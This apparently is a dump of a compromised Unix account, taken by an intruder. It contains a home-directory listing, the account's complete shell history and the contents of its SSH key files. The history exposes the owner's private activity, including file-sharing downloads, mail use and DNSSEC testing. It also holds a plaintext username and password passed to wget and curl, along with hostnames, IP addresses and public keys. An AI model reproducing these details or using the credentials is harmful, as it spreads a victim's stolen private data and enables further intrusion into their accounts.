-rwx------   1 effugas  wheel      40960 Aug 27  2007 haxedit.tgz
-rwxr-xr-x   1 effugas  wheel       5312 Apr  6 14:20 heh
-rw-r--r--   1 effugas  wheel        168 Apr  6 14:20 heh.cpp
drwxr-xr-x   2 effugas  wheel        512 Apr 26 00:32 hmm
-rw-r--r--   1 effugas  wheel    1636602 Oct 28  2005 hmm.txt
-rw-r--r--   1 effugas  wheel       2200 Jan 21  2008 hoho.txt
-rw-r--r--   1 effugas  wheel   15748938 Nov 24  2007 huh_shai.gz
drwxr-xr-x   5 effugas  wheel        512 Jan 24  2006 imgSeek-0.8.6
-rw-r--r--   1 effugas  wheel     396056 Nov 14  2006 imgSeek-0.8.6.tar.bz2
-rw-r--r--   1 effugas  wheel     618624 Aug 12  2007 imsi-capture_phonecrypt_secured.wav
-rw-r--r--   1 effugas  wheel      74086 Jun 10  2006 index.php
-rw-r--r--   1 effugas  wheel      36115 Oct  5  2006 index.txt
-rwxr-xr-x   1 effugas  wheel       2739 Nov  7  2005 info_bot.pl
drwxr-xr-x   2 effugas  wheel     133120 Dec  5  2006 is
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif.1
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif.2
-rw-r--r--   1 effugas  wheel         43 May 15  2007 isf.gif.3
-rw-r--r--   1 effugas  wheel     764567 Nov 26  2007 jm.zone
drwxr-xr-x   2 effugas  wheel        512 Oct  8  2007 johnny
-rw-r--r--   1 effugas  wheel          0 Sep  8  2008 known_hosts
drwxr-xr-x   2 effugas  wheel        512 Mar  8  2005 lib
drwxr-xr-x   7 effugas  wheel       1024 Aug 29  2008 libspf2-1.2.5
-rw-r--r--   1 effugas  wheel     517945 Feb 23  2005 libspf2-1.2.5.tar.gz
-rwx------   1 effugas  wheel    3548321 Jan 21  2008 local3.log
-rw-r--r--   1 effugas  wheel     166676 Feb 22  2008 log.bin
-rw-r--r--   1 effugas  wheel   22722620 Dec  8  2005 log.txt
-rw-r--r--   1 effugas  wheel      10763 Mar 29 18:48 login
drwxr-xr-x   3 effugas  wheel       2048 Dec  5  2006 m
-rw-r--r--   1 effugas  wheel        182 Feb 28  2006 mae.txt
drwxr-xr-x   3 effugas  wheel        512 Jul 17 11:39 mail
drwxrwxrwx   2 effugas  jb           512 Dec 31  2005 mail_oh
-rw-r--r--   1 effugas  wheel       2765 Jun  1  2008 mangle.c
-rw-------   1 effugas  jb       7385213 Oct 28  2005 mater.pgp
-rw-r--r--   1 effugas  wheel         66 Oct 28  2005 mater.pgp.2
-rwxr-xr-x   1 effugas  wheel       4961 Apr 14 17:31 mem
-rw-r--r--   1 effugas  wheel        231 Apr 14 17:31 mem.c
-rw-r--r--   1 effugas  wheel       1002 Jul  6  2008 migrate.pl
drwxr-xr-x   2 effugas  wheel        512 Jan  5  2008 mov
drwxr-xr-x   7 effugas  wheel        512 Sep 29  2005 msn
drwxr-xr-x   2 effugas  wheel        512 Sep 29  2005 msn-bot
-rw-r--r--   1 effugas  wheel      16973 Jul 16  2003 msn-bot.zip
drwxr-xr-x   2 effugas  wheel        512 Jan 13  2006 music
drwxr-xr-x   4 effugas  wheel    4163072 Feb  2  2007 mypix
-rw-r--r--   1 effugas  wheel       7096 Feb 22  2008 mys.txt
-rw-r--r--   1 effugas  wheel      11102 Feb 23  2008 mys_seq.txt
-rw-r--r--   1 effugas  wheel       1032 Feb 23  2008 mys_ts.txt
drwxr-xr-x   7 effugas  wheel       1024 Feb 13  2007 netcat-0.7.1
-rwx------   1 effugas  wheel     398872 Feb 13  2007 netcat-0.7.1.tar.gz
drwxr-xr-x   2 effugas  wheel        512 Jun  5  2007 new
-rw-r--r--   1 effugas  wheel          0 Jun 11  2006 newcert.pem
-rw-r--r--   1 effugas  wheel       1180 Jun 11  2006 newreq.cer
-rw-r--r--   1 effugas  wheel       1180 Jun 11  2006 newreq.pem
-rwxr-xr-x   1 effugas  wheel      10371 Nov 15  2006 nomde.pl
drwxr-xr-x   5 effugas  wheel        512 Sep 17  2004 ophcrack_1_0a
-rw-r--r--   1 effugas  wheel    5114862 Sep 17  2004 ophcrack_1_0a.zip
-rw-r--r--   1 effugas  wheel     139283 Jan 10  2006 out.txt
-rw-------   1 effugas  jb        138418 Sep 28  2005 penn
-rw-------   1 root     wheel  999878656 Nov 25  2008 perl5.8.8.core
-rw-------   1 effugas  wheel   91009024 Jan 26 17:29 pine.core
drwxr-xr-x   3 effugas  wheel      58368 Feb  2  2007 pix
drwxr-xr-x   5 effugas  wheel        512 Jan 26  2007 pix2
-rw-r--r--   1 effugas  wheel        554 Oct  4  2006 pkg-descr
-rw-r--r--   1 effugas  wheel        853 Oct  4  2006 pkg-plist
drwxr-xr-x   3 effugas  wheel        512 Jun  5  2007 s4
-rw-r--r--   1 effugas  wheel     378156 Mar 14  2006 scapy.py
drwxr-xr-x   8 effugas  wheel       2560 Oct  8  2006 screen-4.0.2
-rw-r--r--   1 effugas  wheel     840519 Jan 27  2004 screen-4.0.2.tar.gz
drwxr-xr-x   3 effugas  wheel        512 Sep 27  2005 sdba
-rwxr-xr-x   1 effugas  wheel     486449 Jul 12  2006 sequitur_simple.exe
drwxr-xr-x   2 effugas  wheel        512 Feb  6 14:10 shmoo
-rw-r--r--   1 effugas  wheel     387800 Feb 13  2007 socat-1.5.0.0.tar.gz
-rw-r--r--   1 effugas  wheel          0 Dec 30  2005 spam_first
drwxr-xr-x   2 effugas  wheel       2560 Jul 25  2006 src
-rw-r--r--   1 effugas  wheel        144 Sep 27  2005 subcheck.pl
-rw-rw----   1 effugas  mail   148812841 Dec 30  2005 superchunk_1
-rw-rw----   1 effugas  mail     7489304 Dec 31  2005 superchunk_2
drwxr-xr-x   2 effugas  wheel        512 Apr 20 19:32 swap
-rw-r--r--   1 effugas  wheel        117 Jul  6  2008 tcheck.pl
-rw-r--r--   1 effugas  wheel       1025 Feb 22  2008 test.txt
drwxr-xr-x   2 effugas  wheel        512 Apr  3 15:48 tmp
-rw-r--r--   1 root     wheel     221202 Nov 25  2008 tmp1
-rw-r--r--   1 root     wheel     225530 Nov 25  2008 tmp2
drwxr-xr-x   2 effugas  wheel        512 Nov 11  2008 tor-audit
drwxr-xr-x   5 effugas  wheel       1536 Jun 23  2007 trunk
-rwxr-xr-x   1 effugas  wheel       7232 Feb 13  2007 udpfwd
-rw-r--r--   1 effugas  wheel       3431 Feb 13  2007 udpfwd.c
drwxr-xr-x  20 effugas  wheel       1536 Jun 29 10:16 unbound-1.3.0
-rw-r--r--   1 effugas  wheel    4059848 Jun 11 04:00 unbound-latest.tar.gz
-rw-r--r--   1 effugas  wheel         87 May 17  2007 url.txt
drwxr-xr-x   2 effugas  wheel        512 Sep 20  2005 walker-3.8
-rw-r--r--   1 effugas  wheel      18478 Sep 20  2005 walker-3.8.tar.gz
-rwx------   1 effugas  wheel      24256 Jun 18  2006 webdav.txt
-rwx------   1 effugas  wheel      21710 Jun 18  2006 webdav.xml
drwxr-xr-x   2 effugas  wheel        512 Nov  7  2005 wtf
-rw-r--r--   1 effugas  wheel         92 May 30  2007 wtf.pl
drwxr-xr-x   2 effugas  wheel       1024 Jul 28  2006 xray
-rw-r--r--   1 effugas  wheel      12840 Feb 23  2008 yahoo_seq.txt
-rw-r--r--   1 effugas  wheel      13002 Feb 23  2008 yahoo_ts.txt
%cat .bash_history
ctorrent -h
ctorrent Heroes_-_Season_3_\(Volume_Three_\[3\]___Villains_-_Complete\)_-_S03.4583677.TPB.torrent 
cd ..
cd grab2
ls
ctorrent 1483862
ls
wget http://www.mininova.org/get/2072701
ctorrent 2072
ctorrent 2072701 
rm -rf Family\ Guy\ Season\ 4/
wget http://www.mininova.org/get/2087297
ctorrent 2087297 
pine
pine
pine
pine
pine
pine
pine
pine
pine
pine
pine
pine
pine
cd
ls -l ND*
ls -l *doc
cp Doxpara-NDT\ term\ sheet.doc /export/www/colo.doxpara.com/
pine
pine
pine
cd heh
ls
cd hmm
ls
cd ..
find . | grep -i txt
ls
find . | grep -i heh
cd swap/
ls
more heh.txt 
more heh.txt 
cd
cd heh
ls
find . | grep -i heh
cd swap
cat heh.txt 
cd /export/www/colo.doxpara.com/
wget http://www.state.gov/documents/organization/79958.pdf
screen -D -R
screen -D -R
~#
~#
screen -D -R
screen -D -R
screen D -R
screen -D -R
screen -D -R 
screen -D -R
screen -D -R
screen -D -R
pine
kjhkjhdkjshfksjdf
pine
sdfsdf
whois doxdns1.com
links http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag
links 'http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag'
lynx 'http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag'
cd dl
ls
find . | grep -i ssl
cd data
ls
ls -l ssl*
more dell_
more dell_ssl.txt 
mysql
mysql db
mysql test
ls
cd ..
find . | grep -i ssl
dig @deluvian.doxpara.com _sshfp._autopop.mail.doxpara.com sshfp
dig @deluvian.doxpara.com _sslfp._autopop.mail.doxpara.com cert
dig @deluvian.doxpara.com _sslfp._autopop.mail.microsoft.com cert
dig @deluvian.doxpara.com +dnssec _sshfp._autopop.mail.doxpara.com sshfp
dig @deluvian.doxpara.com _sslfp._autopop.mail.microsoft.com cert
dig @deluvian.doxpara.com dan.doxpara.com cert
dig @deluvian.doxpara.com dan.doxpara.com cert +dnssec
dig @deluvian.doxpara.com dan.doxpara.com cert +dnssec
pine
pine
~
fgfdgdfgdg
cd /export/www/colo.doxpara.com/
ls
vim etweet.pl 
vi etweet.pl 
screen -D -R
nslookup -type=txt g.iranelection.toorrr.com
nslookup -type=txt g.iranelection.toorrr.com
nslookup -type=txt g.iranelection.toorrr.com
nslookup -type=txt g.iranelection.toorrr.com
nslookup -type=txt g.iranelection.toorrr.com
nslookup -type=txt g.iranelection.toorrr.com
nslookup -type=txt g.iranelection.toorrr.com 209.200.168.66
dig @209.200.168.66 g.iranelection.toorrr.com txt
dig @209.200.168.66 g.iranelection.toorrr.com txt
dig g.iranelection.toorrr.com txt
dig g.iranelection.toorrr.com txt
dig g.iranelection.toorrr.com txt
dig g.iranelection.toorrr.com txt
dig g.iranelection.toorrr.com txt
dig g.iranelection.toorrr.com txt
ping www.google.com
ping www.failblog.com
ping www.cnn.com
ping www.metblogs.com
netstat -an | grep -i 443
dig microsoft.com mx
dig boingboing.net mx
nc mx1.emailsrvr.com. 25
telnet mx1.emailsrvr.com 25
telnet mx1.emailsrvr.com 25
telnet mx1.emailsrvr.com 25
telnet mx1.emailsrvr.com 25
dig +short boingboing.net mx
whois ohairan.com
nc mail.ohairan.com
nc mail.ohairan.com 25
nc mail.ohairan.com 25
irc
BitchX
whois 74.125.67.100
dig .
dig . any
dig A.ROOT-SERVERS.NET.
wget http://www.unbound.net/downloads/unbound-latest.tar.gz
tar xzvf unbound-latest.tar.gz 
cd unbound-1.3.0/
./configure 
make
gmake
cat > sample.c
gcc -I ./libunbound -L . -o sample sample.c
gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto
gcc -I ./libunbound -L . -o sample sample.c libunboundla  -lcrypto
gcc -I ./libunbound -L . -o sample sample.c libunbound.la  -lcrypto
gcc -I ./libunbound -L . -o sample sample.c libunbound.la  -lcrypto
gcc -I ./libunbound -L . -o sample sample.c -lunbound  -lcrypto
gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound  -lcrypto
./sample 
fg
vim sample.c 
vi sample.c 
cat > root.hints
cat > root.keys
./sample
gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound  -lcrypto
./sample
time ./sample
dig +dnssec www.afilias.org
fg
vim sample.c 
vi sample.c 
gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound  -lcrypto
./sample 
./sample www.news.com
./sample www.fark.com
./sample www.dnssec.se
fg
./sample www.dnssec.se
vim sample.c
vi sample.c
gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound  -lcrypto
./sample www.dnssec.se
./sample www.afilias.org
./sample c0.org.afilias-nst.info.
./sample dnssec.org
./sample 166.68.193.in-addr.arpa. 
./sample www.whitehouse.gov
./sample www.highinberlin.de
./sample www.dnssec.se
./sample www.dnssec.se
./sample www.dnssec.se
./sample www.iis.se
./sample dotgov.dnsops.gov
./sample www.iana.org
./sample www.fark.com
./sample gov
./sample org
./sample org
./sample afilias.org
./sample dnssec.org
./sample org
./sample www.dynamicnetworkservices.com
./sample www.dnsops.gov
./sample version.dnssec.se
cd
wget http://josefsson.org/walker/releases/walker-3.8.tar.gz
tar xzvf walker-3.8.tar.gz 
cd walker-3.8
./walker 
./walker dnssec.se
./walker se

./walker nonex.dnssec.se
cd
cd unbound-
cd unbound-1.3.0/
./sample nonex.dnssec.se
./sample www.stern.de
./sample www.anon-proxy.de
./sample de
./sample se
./sample gov
./sample usgs.gov
./sample gq
./sample mil
dig +dnssec @204.61.216.37 foo
dig +dnssec @204.61.216.37 foo.com
dig +dnssec @204.61.216.37 coop
dig +dnssec @204.61.216.37 cr
dig +dnssec @204.61.216.37 gov
./sample gov
dig +dnssec @204.61.216.37 gov
dig +dnssec @204.61.216.37 org
dig +dnssec @204.61.216.37 org
dig +dnssec @204.61.216.37 B2.ORG.AFILIAS-NST.org.
./sample B2.ORG.AFILIAS-NST.org.
dig @B0.ORG.AFILIAS-NST.org.
dig +secure @B0.ORG.AFILIAS-NST.org.
dig +dnssec @B0.ORG.AFILIAS-NST.org.
dig +dnssec @B0.ORG.AFILIAS-NST.org. $B0.ORG.AFILIAS-NST.org
dig +dnssec @B0.ORG.AFILIAS-NST.org. org
dig +dnssec @B0.ORG.AFILIAS-NST.org. www.afilias.org
./configure --help
./configure --help | grep  -i nsec
find . | xargs grep nsec3
cd
cd walker-3.8
./walker 
./walker www.dnssec.se
./walker dnssec.se
./walker se
cd ..
cd unbound-
cd unbound-1.3.0/
./sample 0-3.se.
./sample www.0-3.se.
cd ..
cd walker-3.8
./walker gov
./walker de
./walker gov
./walker com
./walker org
dig +dnssec +trace www.dnssec.se
dig @209.200.168.67 foo.com
dig +dnssec @209.200.168.67 foo.com
dig +dnssec @209.200.168.67 foo.com
dig +dnssec @209.200.168.67 foo.com dnskey
cd sample
cd unbound-1.3.0/
ls
mkdir real
mv root* real
cat real/root.keys 
cat > root.keys
cat real/root.hints 
vim root.hints
vi root.hints
./sample foo.com
./sample foo.com
./sample www.cnn.com
./sample www.doxpara.com
dig +dnssec @209.200.168.67 foo.com
dig +dnssec @209.200.168.67 dnskey
dig +dnssec @209.200.168.67 dnskey
dig +dnssec @209.200.168.67 dnskey
dig +dnssec @209.200.168.67 cnn.com dnskey
date
ntpdate
./sample www.doxpara.com
./sample www.doxpara.com
./sample www.doxpara.com
dig @209.200.168.67 .
dig @209.200.168.67 .
dig @209.200.168.67 .
dig @209.200.168.67 .
dig @209.200.168.67 .
dig @209.200.168.67 .
dig @209.200.168.67 .
./sample www.doxpara.com
find . | xargs grep verbose
find . | xargs grep "root-hints"
vim ./util/configlexer.lex
vi ./util/configlexer.lex
vim sample.c
vi sample.c
gcc -I ./libunbound -L . -o sample sample.c -lunbound  -lcrypto
gcc -I ./libunbound -L . -o sample sample.c -lunbound  -lcrypto
gcc -o sample sample.c -lunbound  -lcrypto
gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound  -lcrypto
./sample www.doxpara.com
./sample www.doxpara.com
./sample www.doxpara.com
dig @209.200.168.67 dakadns. DNSKEY
dig @209.200.168.67 dakadns. DNSKEY
dig @209.200.168.67 dakadns. DNSKEY
dig @209.200.168.67 dakadns. DNSKEY
./sample www.doxpara.com
./sample www.doxpara.com
dig dnssec.se dnskey
dig +dnssec dnssec.se dnskey
dig +dnssec dnssec.se dnskey
dig +dnssec se
dig +trace +dnssec www.dnssec.se
dig +trace +dnssec www.dnssec.se dnskey
dig afilias.org
dig afilias.org +trace
dig afilias.org +trace dnskey
dig +trace +dnssec www.dnssec.se dnskey
dig +trace +dnssec dnssec.se dnskey
drill
ls
find . | grep -i drill
cd ldns-src
./drill/
cd drill/
ls
make
cd ..
make
gmake
ls
find . | grep -i drill
./configure 
drill
make
gmake
make drill
gmake drill
ls
drill
cd drill/
ls
gmake
./configure 
gmake
./drill 
./drill 
./drill www.dnssec.se
./drill www.dnssec.se -h
./drill +dnssec www.dnssec.se
./drill -j www.dnssec.se
./drill -h www.dnssec.se
./drill -D www.dnssec.se
./drill -T -D www.dnssec.se
./drill -T -D www.dnssec.se
./drill -T -D -h
./drill @209.200.168.67 -D www.cnn.com
./drill @209.200.168.67 -D www.cnn.com DNSKEY
./drill @209.200.168.67 -D www.cnn.com
./drill @209.200.168.67 -D -T www.cnn.com
./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -D -T www.cnn.com
./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -D -T www.cnn.com
./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys www.cnn.com
./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys www.cnn.com -D
./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com 
./drill  -h
./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com 
./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com 
./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com 
./drill -h
cd ..
cd ..
drill 
drill -r root.hints 
drill -r root.hints 
drill -r root.hints 
cat root.hints 
drill -r root.hints 
drill -r ./root.hints 
drill 
drill -h
drill -r ./root.hints -T
drill -r ./root.hints -T www.cnn.com
drill -r ./root.hints -DT www.cnn.com
drill -r ./root.hints -k root.keys -DT www.cnn.com
drill -r ./root.hints -k root.keys -DT www.cnn.com
drill -r ./root.hints -k root.keys -DT www.cnn.com
drill -r ./root.hints -k root.keys -DT www.cnn.com
drill -r ./root.hints -k root.keys -DT www.cnn.com
drill -r ./real/root.hints -k real/root.keys www.dnssec.se
drill -r ./real/root.hints -k real/root.keys www.dnssec.se
drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se
cat real/root.keys 
cd real/
ls
cp root.keys root.keys.orig
vim root.keys
vi root.keys
cd ..
drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se
cd real/
ls
cat root.keys
cat root.keys | tr -d \n
cat root.keys | tr -d '\n'
cat root.keys | tr -d '\n' | tr -s ' '
cat root.keys | tr -d '\n' | tr -s ' ' > real
ls
mv real root.keys
vim root.keys
vi root.keys
cd ..
drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se
drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se
drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se
drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se
ls
cat root.keys 
cat root.hints 
drill -DT -r root.hints -k ./real/root.keys www.dnssec.se
drill -DT -r root.hints -k root.keys www.dnssec.se
drill -DT -r root.hints -k root.keys www.dnssec.se
drill -DT -r root.hints -k root.keys www.dnssec.se
drill -DT -r root.hints -k root.keys www.dnssec.se
drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com
drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
dig @209.200.168.67 F.ROOT-SERVERS.NET
drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com
drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com
cat real/root.hints 
dig @208.77.188.32 L.ROOT-SERVERS.NET
dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec
dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec
dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec
dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec
ls
cd real/
ls
../sample www.dnssec.se
../sample www.dnssec.se 2> /dev/null
../sample www.dnssec.se 2> /dev/null
../sample www.dnssec.se 2> /dev/null
dig a.root-servers.net
cd
cd dl
wget http://www.watters.ws/rpms/roms/snes/Secret%20of%20Mana.zip
cd dl
mkdir game
cd game
wget -r -l1 http://www.watters.ws/rpms/roms/snes/
airhook
cd airhook-2
./airproxy -l 12000 -o 22
./airproxy -l 12000 -o 22
./airproxy -l 12022 -o 22
cd dl
mkdir new
mkdir n
cd n
cat > goget.txt
 wget --no-check-certificate --user=effugas.2 --password=fuck.2 -i goget.txt 
for i in `cat goget.txt`; do curl -k -u effugas.2:fuck.2 -O $i; done
ls
rm *avi
ls
 wget --no-check-certificate --user=effugas2 --password=fuck.2 -i goget.txt 
pwd
fg
ls
rm *
cd /export/www/colo.doxpara.com/
cat > dns.txt
ls -l dns.txt
pine
cd
mv Nothing\ but\ Net\ -\ 2009\ Internet\ Investment\ Guide.pdf /export/www/colo.doxpara.com/net.pdf
more netcat-0.7.1
cd /export/www/colo.
cd /export/www/colo.doxpara.com/
more net.pdf 
%ls -la .ssh/
total 36
drwxr-xr-x   2 effugas  wheel   512 Nov  9  2005 .
drwx------  68 effugas  wheel  5120 Jul 17 11:43 ..
-rw-r--r--   1 effugas  wheel  1222 Sep  8  2008 authorized_keys
-rw-r--r--   1 effugas  wheel  1211 Sep  8  2008 authorized_keys2
-rw-r--r--   1 effugas  wheel  4749 Sep  8  2008 known_hosts
%cat .ssh/*
ssh-dss
AAAAB3NzaC1kc3MAAACBAIbMIL3650aavJ1W89+NQUvWUAIEvzp7nUK35UB5AfZom8Efa0pgh3rj3ps
gXk9dB19grUuulKkBKLsv4sWv0MOkPd0NLOYOjAQhoyo4vqS7r/1gI57P7RmF7BUJzVduh8ommtbpkD
rf7pP2GtvviBRJwGoHdpZecc+bx5/Ew7PFAAAAFQD7DzAkyFmYb3aH3I/BawF5Y5u3BwAAAIB1uyDMv
hFZshTZJHieXRY8ymCUJTArb6yYRSQL3f0pUyBNud9ojc0wGCEUrenho0FU7I3CFqNh+eDhvPr7luVr
xHqiKtCu37fiG+HfBU/KiRoJI7UtdHK9Mi89XBi02Zh4X+sFoX1pubVH5VMOmtQuDn9gJi9L11l0x2k
HUL/VhQAAAIBBcIEN9AVvKd3/bndPAtesLVLY5KXtvYHMdtN3iyj6Us4ei/TAyA9g/4aNHWeSz2irZm
KBOZqVbzy27aeFiU+A1T//wHqtsBvlCQyWkLbw8ndy/fMg/CtK1ErvsedsT5RSmnT1GXEzuNQvEi19R
nR+WhQHes8FuX+FE6u/nVDomw== kaminsky@avaya-8j8h5dc15
ssh-dss
AAAAB3NzaC1kc3MAAACBAJ+WvdG7iu2bzetu1ot9692qeXuhjqcEWUrTq2uwUR/X2EiclfYdBcjeUMZ
4uu9sQDpbSYZ2VNu97YYzM+2Z8VdDnW2Bt+Tpan49eUcttgIPvCAibPTJHqrwTyeJE+lPrqq11qnFYW
nR/wVRt0Ouf579e8CS0GJVvIuC/oSE4QEPAAAAFQDOEApeEzWHJkYYeQQvxfvxNL9NAQAAAIBYy0k3Y
8U021sjqwMeqe+xp0rLqV+6giXzE5ccI9G61UxhA7wFQluXpHobwgnKbIgwnGLymWp5DhDmgv0dNzl+
cgnKgNg+9hXhQ5k3jLbI1sSBzwb1HD70i7kvvMhMXcihGyhdZ7BBqKfIohdPodynKwwO3tebwJlE9rl
cSWMTvAAAAIBgoyTRPIb1arSy20xzZO548c07v18PSdxMWCjL1urwqDl5zZq+SUrB7B2L5xPr6m6nz7
sTgYFI0ZnxvXJg0PilDAbYcggVcOPrdvcKpJQx9tcn1lPeRYgpCzB5iyqwD/tBhEp0wv4wbvFHgVDZk
rIS6NFKvcitBxsO9TfdbPkGaw== dan@v-dakami-styro
ssh-dss
AAAAB3NzaC1kc3MAAACBAMfpCLXVIDpATuWVjdFYCdrnkgwzkc8yplVF7TFUzFcxFr1Vi/+lKFe2TaD
AnUYpTnZpSPvsEPe+s2SWEOS8EX1gM5iT4Z/8ThOXKtEi1fTkGBsqKy1A4YeesooRlKW54MrCDMX2C5
l+VTgMMgqO9Dp86YM+lNpYhh+HKz+gHnixAAAAFQCV7/+zWBfgoVXjUheV5kbDCHSC5wAAAIEAlMHWJ
ymTMAW8Du/fRgZVUTM1XFqQqwWiX28Ir3oYnzszoM/tNUMyVTisS6Fd+xgehC2t2FcGRiipwbatydhT
19pX5dndoTGZEpSOnTVv9EcmMGb0bjQ7YEIOdCk2dPsOjRwnwwX/LolbYKhb8e0lX1Y9r9f8KPVnVXG
6Wpu0TywAAACBAJDNmXtTPRu603+utnGUv98vuyii/eQeV7lk2TgxY12mjfcdWSK3bGP9afSatSGRPj
qUCJW9SWAvCD5xe5pSlUrz3nv7Gh2ahUZWV7DCGoPSgrb3eC5AHcyQ+q+f9NrY623nanBoZkkTQjIrA
shFrIGqD10RCQwKM47PkmE34qY3 root@deluvian
ssh-dss
AAAAB3NzaC1kc3MAAACBAJ+WvdG7iu2bzetu1ot9692qeXuhjqcEWUrTq2uwUR/X2EiclfYdBcjeUMZ
4uu9sQDpbSYZ2VNu97YYzM+2Z8VdDnW2Bt+Tpan49eUcttgIPvCAibPTJHqrwTyeJE+lPrqq11qnFYW
nR/wVRt0Ouf579e8CS0GJVvIuC/oSE4QEPAAAAFQDOEApeEzWHJkYYeQQvxfvxNL9NAQAAAIBYy0k3Y
8U021sjqwMeqe+xp0rLqV+6giXzE5ccI9G61UxhA7wFQluXpHobwgnKbIgwnGLymWp5DhDmgv0dNzl+
cgnKgNg+9hXhQ5k3jLbI1sSBzwb1HD70i7kvvMhMXcihGyhdZ7BBqKfIohdPodynKwwO3tebwJlE9rl
cSWMTvAAAAIBgoyTRPIb1arSy20xzZO548c07v18PSdxMWCjL1urwqDl5zZq+SUrB7B2L5xPr6m6nz7
sTgYFI0ZnxvXJg0PilDAbYcggVcOPrdvcKpJQx9tcn1lPeRYgpCzB5iyqwD/tBhEp0wv4wbvFHgVDZk
rIS6NFKvcitBxsO9TfdbPkGaw== dan@v-dakami-styro
64.81.64.164 ssh-dss
AAAAB3NzaC1kc3MAAACBAJdeuSigqiBzh1FyeS3aP553guQwlVw2yKB2ybhOTAWydLg9hMTyEPP03Fv
qYTH6DKDp4ZiitD3qyQ4IIW6OJESdJI0MoAsyx6StWbrBBbPtdPCp6evELMEHW3ij2YYQ9/XnYyKzbM
nfTjj21v1UNOYp/tW9ruqpXgkR+f/VL8URAAAAFQCp+YXeAw40gBek+O0445aVHwL+0wAAAIBWZzk9k
/smtfLXV0OI/y/qyJT4EUDCK0bRQirq3AOXR58rgon9/Q1UCyLdIqBLjZke0vaWJgSzGD/XdSLhx1Lv
XYioQvvnyOLNVZDVP5koOB/pYIGQ9TwVwgBoL0X6ZCvnShZ648wu7aEInVLFP5TxxKHeAGQvx8tB5nB
CwiKe6wAAAIA+AQp/BoSRwmSL2lus4zEEDsrmReHXZQwFcWGhkwLiMLPdw9HuHzMqfD7TBLwDGnOoEf
Vl7vizxiaYUzVllSdiplkI4juJw+ApioItkjRdFo+X9KjNsQhtYe20yCvx4OFOIiB1miSawEbe34c7G
M5VBKGQL4ClMLkpZ+W0gEe3EQ==
scan.doxpara.com ssh-dss
AAAAB3NzaC1kc3MAAACBALGVYHAJYr0DR4QX2YLhARTk0WW8HVnnR1xOIC6JeZbk89CM5F6P8VJKq2a
hMkmGQkIqZtVvdmvjmfhxaTUS8lXtCM5rLO94yz7bgMrWtaoZTXCnEA1aBzhW3YMD/2ByPlJU2lO0Qe
h09HFgIAquSYbCEYFE5lGVP5LTT5W1Y8SlAAAAFQC7x95hEymD5hB3jY+1zD6DfWcX5QAAAIBnqp1PQ
WU0E3SiYzKB6lKqYm9rzh8ogkHcN6mBpW0kODNETt0xW5vXhE5hP83qX9ZF4WpCl6TSdmI72h8hOq48
jhUzqhuoqGepFYXlDUTK4LxzD77YRB2lohP+/eVkLKmzv5IevbOzAJFU98E207u9nIZnnYtEbRYy8oS
khLbrDQAAAIEApkzPne/BmYH9h8pW0YAVxu4uM1j4QjsS0UrytJYPQKmPCgxUoypI/LYFB1yqZ1pzFw
AjBhXUFENQuJ/Lmf8smtyt+ETUrUSsakPtEOuNq5+SHHXsyGNERDm455Su+cMu2+W4+/36Kq53TAYN7
YtggKFrh6DcqEl8rELCK6ytlYc=
iahu.ca ssh-dss
AAAAB3NzaC1kc3MAAACBAMyspq4LQUMKNdT4I98KQiO7M85kIg9IBCw+GLNiHIU98wM7JsiLDF+ntAy
jQFRaxaEm/Vs2XIHDBNiIXyqhBEpNhMwDfrAsiB5Jyx8VdcVk23Y/oRENU63wCkOeIZDJ0Ed9ekv1/w
